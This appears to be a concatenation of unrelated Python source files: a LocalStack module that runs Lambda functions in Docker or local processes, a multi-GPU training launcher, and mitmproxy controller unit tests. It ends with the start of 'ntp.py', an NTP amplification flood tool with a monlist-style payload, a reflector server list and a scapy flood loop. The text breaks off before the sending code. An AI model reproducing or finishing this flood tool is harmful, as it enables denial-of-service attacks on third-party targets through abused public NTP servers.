environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_info.name)
if not self._should_use_stay_open_mode(lambda_docker_ip, check_port=True):
LOG.debug("Using 'docker exec' to run invocation in docker-reuse Lambda container")
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
inv_result = self.invoke_lambda(lambda_function, inv_context, lambda_docker_ip)
return (inv_result.result, inv_result.log_output)
def invoke_lambda(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
lambda_docker_ip=None,
) -> InvocationResult:
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
client = aws_stack.connect_to_service("lambda", endpoint_url=full_url)
event = inv_context.event or "{}"
LOG.debug(f"Calling {full_url} to run invocation in docker-reuse Lambda container")
response = client.invoke(
FunctionName=lambda_function.name(),
InvocationType=inv_context.invocation_type,
Payload=to_bytes(event),
LogType="Tail",
)
log_output = base64.b64decode(response.get("LogResult") or b"").decode("utf-8")
result = response["Payload"].read().decode("utf-8")
if "FunctionError" in response:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
)
return InvocationResult(result, log_output)
def _should_use_stay_open_mode(
self, lambda_docker_ip: Optional[str], check_port: bool = False
) -> bool:
"""Return whether to use stay-open execution mode - if we're running in Docker, the given IP
is defined, and if the target API endpoint is available (optionally, if check_port is True)."""
should_use = lambda_docker_ip and in_docker()
if not should_use or not check_port:
return False
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
return is_port_open(full_url)
def _get_lambda_stay_open_url(self, lambda_docker_ip: str) -> str:
return f"http://{lambda_docker_ip}:{STAY_OPEN_API_PORT}"
def _execute(self, func_arn: str, *args, **kwargs) -> InvocationResult:
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn: str = None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
:param lambda_function: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
def wait_up():
cont_status = DOCKER_CLIENT.get_container_status(container_name)
assert cont_status == DockerContainerStatus.UP
if not in_docker():
return
# if we're executing in Docker using stay-open mode, additionally check if the target is available
lambda_docker_ip = DOCKER_CLIENT.get_container_ip(container_name)
if self._should_use_stay_open_mode(lambda_docker_ip):
full_url = self._get_lambda_stay_open_url(lambda_docker_ip)
wait_for_port_open(full_url, sleep_time=0.5, retries=8)
# give the container some time to start up
retry(wait_up, retries=15, sleep=0.8)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
command = None
entrypoint = "/bin/bash"
interactive = True
if in_docker():
env_vars["DOCKER_LAMBDA_STAY_OPEN"] = "1"
entrypoint = None
command = [lambda_function.handler]
interactive = False
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=interactive,
detach=True,
name=container_name,
entrypoint=entrypoint,
command=command,
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(
filter=f"name={self.get_container_prefix()}*"
)
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_prefix(self) -> str:
"""
Returns the prefix of all docker-reuse lambda containers for this LocalStack instance
:return: Lambda container name prefix
"""
return f"{bootstrap.get_main_container_name()}_lambda_"
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return self.get_container_prefix() + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(
self, cmd: Union[str, List[str]], lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
# store_lambda_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
# apply plugin patches to prepare invocation context
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = lambda_function.function(inv_context.function_version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
if isinstance(result, InvocationResult) and result.log_output:
log_output += "\n" + result.log_output
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
store_lambda_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
# construct final invocation result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
) -> InvocationResult:
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = [
"node",
"-e",
'require("%s").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'
% (
main_file,
function,
event_json_string,
context_json_string,
),
]
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.dirs.tmp, r"%s/\1" % config.dirs.functions, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
if runtime == "nodejs14.x" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
if runtime == "python3.9" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until we support AWS images via https://github.com/localstack/localstack/pull/4734
docker_image = "mlupin/docker-lambda"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.dirs.tmp, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
return env_vars
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
|
run_multi_q3.py
|
import os
from multiprocessing import Process, Lock
import re
base_folder = 'code/data'
data_folder = 'data'
exp_names = ['rec_hist_60_delta_3','rec_hist_60_delta_5','rec_hist_60_delta_10']
system_code = ['cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 3',
'cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 5',
'cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 10']
system_code = [s%(i) for s,i in zip(system_code,exp_names)]
def run_funct(lock, code, gpu):
lock.acquire()
append_str = " --visible_gpus %d"%(gpu)
os.system(code + append_str)
lock.release()
processes = []
locks = [Lock() for _ in range(2)]
for idx, single_code in enumerate(system_code):
p = Process(target=run_funct, args=(locks[idx % len(locks)], single_code, idx % len(locks)))
p.start()
processes.append(p)
for p in processes:
p.join()
folder_names = []
for exp_name in exp_names:
pattern = re.compile('q3_' + exp_name + '_.*')
matching_folders = [os.path.join(data_folder,a) for a in os.listdir(base_folder) if pattern.search(a) is not None]
folder_names.append(matching_folders[0])
os.system('cd code && python3 plot_train_vs_eval.py %s --legend %s'%(' '.join(folder_names), ' '.join(exp_names) ) )
|
test_controller.py
|
from threading import Thread, Event
from unittest.mock import Mock
import queue
import pytest
from mitmproxy.exceptions import Kill, ControlException
from mitmproxy import controller
from mitmproxy import master
from mitmproxy import proxy
from mitmproxy.test import taddons
class TMsg:
pass
class TestMaster:
def test_simple(self):
class tAddon:
def log(self, _):
ctx.master.should_exit.set()
with taddons.context() as ctx:
ctx.master.addons.add(tAddon())
assert not ctx.master.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
ctx.master.event_queue.put(("log", msg))
ctx.master.run()
assert ctx.master.should_exit.is_set()
def test_server_simple(self):
m = master.Master(None, proxy.DummyServer(None))
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread:
def test_simple(self):
m = Mock()
t = master.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel:
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock(name="test_tell")
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.send(42)
obj.reply.take()
obj.reply.commit()
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock(name="test_ask_simple")) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with pytest.raises(Kill):
channel.ask("test", Mock(name="test_ask_shutdown"))
class TestReply:
def test_simple(self):
reply = controller.Reply(42)
assert reply.state == "start"
reply.send("foo")
assert reply.value == "foo"
reply.take()
assert reply.state == "taken"
with pytest.raises(queue.Empty):
reply.q.get_nowait()
reply.commit()
assert reply.state == "committed"
assert reply.q.get() == "foo"
def test_kill(self):
reply = controller.Reply(43)
reply.kill()
reply.take()
reply.commit()
assert reply.q.get() == Kill
def test_ack(self):
reply = controller.Reply(44)
reply.ack()
reply.take()
reply.commit()
assert reply.q.get() == 44
def test_reply_none(self):
reply = controller.Reply(45)
reply.send(None)
reply.take()
reply.commit()
assert reply.q.get() is None
def test_commit_no_reply(self):
reply = controller.Reply(46)
reply.take()
with pytest.raises(ControlException):
reply.commit()
reply.ack()
reply.commit()
def test_double_send(self):
reply = controller.Reply(47)
reply.send(1)
with pytest.raises(ControlException):
reply.send(2)
reply.take()
reply.commit()
def test_state_transitions(self):
states = {"start", "taken", "committed"}
accept = {
"take": {"start"},
"commit": {"taken"},
"ack": {"start", "taken"},
}
for fn, ok in accept.items():
for state in states:
r = controller.Reply(48)
r._state = state
if fn == "commit":
r.value = 49
if state in ok:
getattr(r, fn)()
else:
with pytest.raises(ControlException):
getattr(r, fn)()
r._state = "committed" # hide warnings on deletion
def test_del(self):
reply = controller.Reply(47)
with pytest.raises(ControlException):
reply.__del__()
reply.ack()
reply.take()
reply.commit()
class TestDummyReply:
def test_simple(self):
reply = controller.DummyReply()
for _ in range(2):
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
reply.reset()
assert reply.state == "start"
def test_reset(self):
reply = controller.DummyReply()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
assert reply.state == "committed"
reply.reset()
assert reply.state == "start"
def test_del(self):
reply = controller.DummyReply()
reply.__del__()
|
ntp.py
|
#!/usr/bin/env python3
#MIT License
#
#Copyright (c) 2021 Sloobot
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NTP attack...")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/L4/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
